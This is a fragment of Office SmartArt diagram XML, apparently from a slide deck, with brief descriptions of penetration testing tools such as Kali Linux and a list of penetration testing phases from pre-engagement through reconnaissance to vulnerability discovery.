    <dgm:pt modelId="{35D44BD2-8F93-4F20-919D-C82D5F814A1B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>A web application security testing tool used for scanning, crawling, and manipulating web applications to identify and exploit vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2F1023A-FC5E-4D42-A7A2-17FCF37B0B0C}" type="parTrans" cxnId="{8D404908-6169-477A-B7E3-28B2DC785813}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C5122D0-2ECB-4506-9D52-4EED0FFCFD8F}" type="sibTrans" cxnId="{8D404908-6169-477A-B7E3-28B2DC785813}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A185465-5076-47DB-81E4-16FC112950F9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>An open-source penetration testing framework that provides tools for developing, testing, and executing exploits against a target system, with a large database of known vulnerabilities and attack techniques.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ADEB3CE-8FE7-4E91-926C-750F9F66D3EE}" type="parTrans" cxnId="{D348B42D-1052-42DC-A772-FFC652BB6E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5955B2D-186B-4BDC-BFEB-DAE7BF6D3140}" type="sibTrans" cxnId="{D348B42D-1052-42DC-A772-FFC652BB6E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDBB77DF-D99A-4179-8031-6BAA70880280}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Kali Linux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81C62052-FA68-47BF-990E-D55A3F8C3B04}" type="parTrans" cxnId="{3BD77122-D946-4E7E-8E63-EE7460624620}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3E3D14E-9F74-49F6-9187-00B801939DF0}" type="sibTrans" cxnId="{3BD77122-D946-4E7E-8E63-EE7460624620}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{096C313A-096E-4100-A86F-4918C24C986E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>A Debian-based Linux distribution designed for digital forensics, penetration testing, and security research, equipped with a wide range of tools for various cybersecurity tasks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EDD58E3-E58C-437A-8F78-73D6C3636B89}" type="parTrans" cxnId="{719AE081-1AF7-41E1-B175-C01B29A2B326}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3022E876-4F48-46D8-A918-C04FC8F41C87}" type="sibTrans" cxnId="{719AE081-1AF7-41E1-B175-C01B29A2B326}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" type="pres">
      <dgm:prSet presAssocID="{69899A78-1554-438F-B318-5690E1F072DC}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D14E6666-5823-49B2-8436-2ADED0D6F0BB}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E048BF38-127B-4B16-BAB1-DD519BA74E11}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="80202">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BA78D3E-3511-446D-BD34-C7B5DCA4D2AA}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D8A04E3-FDFF-453B-96A6-23A4F5C52E84}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51F3E5C1-C9D8-4C07-8A31-E5212FFD7CDB}" type="pres">
      <dgm:prSet presAssocID="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD0C9C75-45C5-4D36-814C-965FBD4E9EB4}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4E3C66B-8F0F-434F-AD19-440B6CF0C4D7}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="80202">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1AFAB2B-202E-4D1C-AE87-E09E87652338}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D73FC966-033B-40D7-803E-63813C292ECB}" type="pres">
      <dgm:prSet presAssocID="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{86761846-997B-4A7F-BC2A-4B2DA5FA285E}" type="pres">
      <dgm:prSet presAssocID="{BDBB77DF-D99A-4179-8031-6BAA70880280}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A463390-889D-410A-BC84-A2BBE71A54BD}" type="pres">
      <dgm:prSet presAssocID="{BDBB77DF-D99A-4179-8031-6BAA70880280}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99DFC062-7202-4C35-9C44-3C7AB530A6AE}" type="pres">
      <dgm:prSet presAssocID="{BDBB77DF-D99A-4179-8031-6BAA708802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3E81B1-36CB-4141-BD29-66BC52E2A743}" type="pres">
      <dgm:prSet presAssocID="{BDBB77DF-D99A-4179-8031-6BAA70880280}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68BC9EC0-7B1D-4D5E-A894-0DB85B2846D8}" type="pres">
      <dgm:prSet presAssocID="{BDBB77DF-D99A-4179-8031-6BAA708802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E89802-2B2F-4CAD-AD36-F25A6945BE4A}" type="presOf" srcId="{096C313A-096E-4100-A86F-4918C24C986E}" destId="{68BC9EC0-7B1D-4D5E-A894-0DB85B2846D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6D0E2008-C11F-4189-863A-D3C2BE8C6A99}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" srcOrd="0" destOrd="0" parTransId="{4380442B-D32A-48C3-9973-32F9B92DED6D}" sibTransId="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}"/>
    <dgm:cxn modelId="{8D404908-6169-477A-B7E3-28B2DC785813}" srcId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" destId="{35D44BD2-8F93-4F20-919D-C82D5F814A1B}" srcOrd="0" destOrd="0" parTransId="{D2F1023A-FC5E-4D42-A7A2-17FCF37B0B0C}" sibTransId="{3C5122D0-2ECB-4506-9D52-4EED0FFCFD8F}"/>
    <dgm:cxn modelId="{3BD77122-D946-4E7E-8E63-EE7460624620}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{BDBB77DF-D99A-4179-8031-6BAA70880280}" srcOrd="2" destOrd="0" parTransId="{81C62052-FA68-47BF-990E-D55A3F8C3B04}" sibTransId="{E3E3D14E-9F74-49F6-9187-00B801939DF0}"/>
    <dgm:cxn modelId="{0F5F8728-208F-4D30-91E2-EA64830F0ECD}" type="presOf" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8A185629-0D7C-4B32-8046-F61C93490EFA}" type="presOf" srcId="{6A185465-5076-47DB-81E4-16FC112950F9}" destId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" srcOrd="1" destOrd="0" parTransId="{86594B5D-00B2-47E8-BE05-61E05F58E569}" sibTransId="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}"/>
    <dgm:cxn modelId="{D348B42D-1052-42DC-A772-FFC652BB6E15}" srcId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" destId="{6A185465-5076-47DB-81E4-16FC112950F9}" srcOrd="0" destOrd="0" parTransId="{1ADEB3CE-8FE7-4E91-926C-750F9F66D3EE}" sibTransId="{F5955B2D-186B-4BDC-BFEB-DAE7BF6D3140}"/>
    <dgm:cxn modelId="{7754CD31-8492-430B-BF7B-4B32DE39A22D}" type="presOf" srcId="{BDBB77DF-D99A-4179-8031-6BAA70880280}" destId="{99DFC062-7202-4C35-9C44-3C7AB530A6AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{38933140-4D9D-41EA-AB79-FC1FFFA80441}" type="presOf" srcId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" destId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1A85315B-388B-4C02-8662-F73F55FF6D40}" type="presOf" srcId="{BDBB77DF-D99A-4179-8031-6BAA70880280}" destId="{1A463390-889D-410A-BC84-A2BBE71A54BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F8FA0155-E62F-438D-8D6A-6676BA1480B7}" type="presOf" srcId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" destId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{719AE081-1AF7-41E1-B175-C01B29A2B326}" srcId="{BDBB77DF-D99A-4179-8031-6BAA70880280}" destId="{096C313A-096E-4100-A86F-4918C24C986E}" srcOrd="0" destOrd="0" parTransId="{9EDD58E3-E58C-437A-8F78-73D6C3636B89}" sibTransId="{3022E876-4F48-46D8-A918-C04FC8F41C87}"/>
    <dgm:cxn modelId="{1FB8EE87-7C38-49E8-86A7-08EB4A8E4BFF}" type="presOf" srcId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" destId="{E048BF38-127B-4B16-BAB1-DD519BA74E11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F03A09A0-28CB-4F7E-BAF7-59F4144CAA17}" type="presOf" srcId="{35D44BD2-8F93-4F20-919D-C82D5F814A1B}" destId="{6D8A04E3-FDFF-453B-96A6-23A4F5C52E84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9B8C0CE8-2A5A-46BF-92E1-99BB20D0F0FA}" type="presOf" srcId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" destId="{F4E3C66B-8F0F-434F-AD19-440B6CF0C4D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{62C4A2D0-9026-465E-B9B4-B73293C850F7}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{D14E6666-5823-49B2-8436-2ADED0D6F0BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CEF53F37-97D0-4F91-9FCA-3D463BED5DDC}" type="presParOf" srcId="{D14E6666-5823-49B2-8436-2ADED0D6F0BB}" destId="{E048BF38-127B-4B16-BAB1-DD519BA74E11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FC8EB449-C7DF-4EFC-BF82-97C50BE46F41}" type="presParOf" srcId="{D14E6666-5823-49B2-8436-2ADED0D6F0BB}" destId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{166F1C30-7F56-49BA-BC19-21C4A6D02B0D}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{0BA78D3E-3511-446D-BD34-C7B5DCA4D2AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70735837-B99A-442A-9904-96832A9E4EFB}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{6D8A04E3-FDFF-453B-96A6-23A4F5C52E84}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4FA890B0-7B6E-4A01-95C0-CA69D6C4909E}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{51F3E5C1-C9D8-4C07-8A31-E5212FFD7CDB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0E6A004C-1A36-41E2-AA07-0B4C2861F4C5}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{BD0C9C75-45C5-4D36-814C-965FBD4E9EB4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A5666936-39CF-4453-9344-658495778404}" type="presParOf" srcId="{BD0C9C75-45C5-4D36-814C-965FBD4E9EB4}" destId="{F4E3C66B-8F0F-434F-AD19-440B6CF0C4D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{12CD1378-5C08-40C1-AE95-1D438F233956}" type="presParOf" srcId="{BD0C9C75-45C5-4D36-814C-965FBD4E9EB4}" destId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{90B194FF-A223-4DAD-9AF5-571FA370A571}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{B1AFAB2B-202E-4D1C-AE87-E09E87652338}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{92170CC7-299C-4F1E-9B29-2B756CEFA910}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2754DD87-3D9E-4257-BAF1-588AF086B161}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{D73FC966-033B-40D7-803E-63813C292ECB}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E53FF231-A0AF-4020-8239-21E930F84987}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{86761846-997B-4A7F-BC2A-4B2DA5FA285E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA39EF80-C66C-4B12-9F57-1AD5E72775B0}" type="presParOf" srcId="{86761846-997B-4A7F-BC2A-4B2DA5FA285E}" destId="{1A463390-889D-410A-BC84-A2BBE71A54BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{34E29F61-30BE-4382-94D0-8A2FCD46B648}" type="presParOf" srcId="{86761846-997B-4A7F-BC2A-4B2DA5FA285E}" destId="{99DFC062-7202-4C35-9C44-3C7AB530A6AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1091133C-932D-48BE-9579-B4376857FD42}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{AA3E81B1-36CB-4141-BD29-66BC52E2A743}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{22258BB4-1EDB-4714-821D-2847C65F86B7}" type="presParOf" srcId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" destId="{68BC9EC0-7B1D-4D5E-A894-0DB85B2846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FD2DD-12F1-43FE-972A-8F8AC55BEB41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446CF9-05BD-4C54-AD18-AEE4A5D215DF}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p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Penetration testing process</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i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57805A78-8262-44F0-9745-59D508633528}" type="sibTrans" cxnId="{034873FA-182F-40D6-B4DA-9F21E213A933}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A3E7C3F-996D-4284-A196-5DF5E2B118E6}" type="parTrans" cxnId="{034873FA-182F-40D6-B4DA-9F21E213A933}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA3D112B-D920-4ABB-A039-33BD00D46752}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p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Pre-engagement Phase</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F18C7A8C-85AB-4167-A0F8-7274646081D0}" type="sibTrans" cxnId="{E5AFC930-226C-4C69-9D82-5E6EDFBF1F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{890A6ABB-3E2D-4334-9FC3-758713BD2CC3}" type="parTrans" cxnId="{E5AFC930-226C-4C69-9D82-5E6EDFBF1F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{859AE946-6B5B-4EB8-B617-A8B630C3A5B2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Define Scope</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C5552F-564A-4FC6-A258-F1709B039BE2}" type="sibTrans" cxnId="{B9F1F24A-C7D8-406B-A749-B8FDC594C45F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{597857DF-DC9C-48B5-B3CD-0A47E034B2EA}" type="parTrans" cxnId="{B9F1F24A-C7D8-406B-A749-B8FDC594C45F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CB356B6-ABF8-45F9-826D-64CF0AFB1D04}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Gather Information</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13E5159B-44A7-4089-8DBF-1DB9E82CBF02}" type="sibTrans" cxnId="{FE792F6F-DB83-4915-9219-222295751B37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9512378D-1112-4C71-B9B9-DE3B9E169C80}" type="parTrans" cxnId="{FE792F6F-DB83-4915-9219-222295751B37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2D6C4E9-93B0-4C94-B391-F3C0FA4F2163}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Passive Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8E9D7FA-62FA-4F8C-B47B-BB62245D207D}" type="sibTrans" cxnId="{F4937250-0B0D-4A2F-9C40-B0B9006A8E4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5ED2C56-B2D3-44E1-9F40-8B0193984739}" type="parTrans" cxnId="{F4937250-0B0D-4A2F-9C40-B0B9006A8E4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DE43D11-D55A-4DED-B63B-67DA8447F4E6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0"/>
            <a:t>Active Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7DEB547-2D3D-4D48-A9A4-97AB9464FF85}" type="sibTrans" cxnId="{05DD5A47-54A0-4D6A-8BEE-65BA71FF70C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9306B73A-6E29-478A-A9E5-B768742B3AEC}" type="parTrans" cxnId="{05DD5A47-54A0-4D6A-8BEE-65BA71FF70C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60CF3575-3E4A-4BE3-97F9-AEC3574E32BD}">
      <dgm:prSet phldrT="[Text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Vulnerability discovery Phase</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FF6B7B2-613D-4801-9956-E8F4498CA060}" type="sibTrans" cxnId="{AF9878F8-2E20-4AE8-8326-28FC56911165}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
